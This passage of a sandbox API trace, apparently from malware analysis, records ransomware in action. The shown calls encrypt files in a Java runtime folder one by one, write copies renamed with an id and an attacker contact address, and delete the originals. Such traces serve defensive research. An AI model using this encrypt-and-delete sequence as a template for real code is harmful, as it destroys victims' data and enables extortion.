[0153.631] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.631] CryptDestroyKey (hKey=0xac3370) returned 1 [0153.631] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.631] CryptDestroyKey (hKey=0xac32f0) returned 1 [0153.631] CloseHandle (hObject=0x2f8) returned 1 [0153.631] CloseHandle (hObject=0x2dc) returned 1 [0153.631] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip")) returned 1 [0153.632] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.632] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.633] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2860) returned 1 [0153.633] CloseHandle (hObject=0x2dc) returned 1 [0153.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties")) returned 0x20 [0153.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.633] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.633] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.633] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3170) returned 1 [0153.633] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.634] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xb2c, lpOverlapped=0x0) returned 1 [0153.637] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xb30, dwBufLen=0xb30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xb30) returned 1 [0153.637] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xb30, lpOverlapped=0x0) returned 1 [0153.638] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2db0) returned 1 [0153.638] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.638] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0153.638] CryptDestroyKey (hKey=0xac2db0) returned 1 [0153.638] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0153.638] CryptDestroyKey (hKey=0xac3170) returned 1 [0153.638] CloseHandle (hObject=0x2dc) returned 1 [0153.638] CloseHandle (hObject=0x2f8) returned 1 [0153.638] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties")) returned 1 [0153.639] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.639] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3306) returned 1 [0153.639] CloseHandle (hObject=0x2f8) returned 1 [0153.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties")) returned 0x20 [0153.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.640] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.640] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.640] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3330) returned 1 [0153.640] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.640] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xcea, lpOverlapped=0x0) returned 1 [0153.641] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xcf0, dwBufLen=0xcf0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xcf0) returned 1 [0153.641] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xcf0, lpOverlapped=0x0) returned 1 [0153.642] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2eb0) returned 1 [0153.642] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.642] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0153.642] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0153.642] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0153.643] CryptDestroyKey (hKey=0xac3330) returned 1 [0153.643] CloseHandle (hObject=0x2f8) returned 1 [0153.643] CloseHandle (hObject=0x2dc) returned 1 [0153.643] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties")) returned 1 [0153.644] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.644] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.750] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3600) returned 1 [0153.755] CloseHandle (hObject=0x2ec) returned 1 [0153.756] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties")) returned 0x20 [0153.756] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.756] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.756] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.756] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2f30) returned 1 [0153.756] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.756] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xe10, lpOverlapped=0x0) returned 1 [0153.758] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xe20, dwBufLen=0xe20 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xe20) returned 1 [0153.758] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe20, lpOverlapped=0x0) returned 1 [0153.759] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3130) returned 1 [0153.759] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.759] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0153.759] CryptDestroyKey (hKey=0xac3130) returned 1 [0153.759] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0153.759] CryptDestroyKey (hKey=0xac2f30) returned 1 [0153.759] CloseHandle (hObject=0x2ec) returned 1 [0153.759] CloseHandle (hObject=0x2e0) returned 1 [0153.759] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties")) returned 1 [0153.760] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.761] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3752) returned 1 [0153.761] CloseHandle (hObject=0x2e0) returned 1 [0153.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties")) returned 0x20 [0153.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.765] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.765] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.765] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3230) returned 1 [0153.765] CryptSetKeyParam (hKey=0xac3230, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.765] ReadFile (in: hFile=0x2e0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xea8, lpOverlapped=0x0) returned 1 [0153.767] CryptEncrypt (in: hKey=0xac3230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xeb0, dwBufLen=0xeb0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xeb0) returned 1 [0153.767] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xeb0, lpOverlapped=0x0) returned 1 [0153.768] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3130) returned 1 [0153.768] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.768] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x60, dwBufLen=0x60 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x60) returned 1 [0153.768] CryptDestroyKey (hKey=0xac3130) returned 1 [0153.768] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x112, lpOverlapped=0x0) returned 1 [0153.768] CryptDestroyKey (hKey=0xac3230) returned 1 [0153.768] CloseHandle (hObject=0x2e0) returned 1 [0153.768] CloseHandle (hObject=0x2ec) returned 1 [0153.768] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties")) returned 1 [0153.769] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.769] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3752) returned 1 [0153.769] CloseHandle (hObject=0x2ec) returned 1 [0153.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties")) returned 0x20 [0153.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.770] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.770] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.770] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2fb0) returned 1 [0153.770] CryptSetKeyParam (hKey=0xac2fb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.770] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xea8, lpOverlapped=0x0) returned 1 [0153.772] CryptEncrypt (in: hKey=0xac2fb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xeb0, dwBufLen=0xeb0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xeb0) returned 1 [0153.772] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xeb0, lpOverlapped=0x0) returned 1 [0153.773] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3430) returned 1 [0153.773] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.773] CryptEncrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x60, dwBufLen=0x60 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x60) returned 1 [0153.773] CryptDestroyKey (hKey=0xac3430) returned 1 [0153.773] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x112, lpOverlapped=0x0) returned 1 [0153.773] CryptDestroyKey (hKey=0xac2fb0) returned 1 [0153.773] CloseHandle (hObject=0x2ec) returned 1 [0153.773] CloseHandle (hObject=0x2e0) returned 1 [0153.773] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_tw.properties")) returned 1 [0153.774] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.774] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.774] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=8590) returned 1 [0153.774] CloseHandle (hObject=0x2e0) returned 1 [0153.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif")) returned 0x20 [0153.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.775] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.775] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec 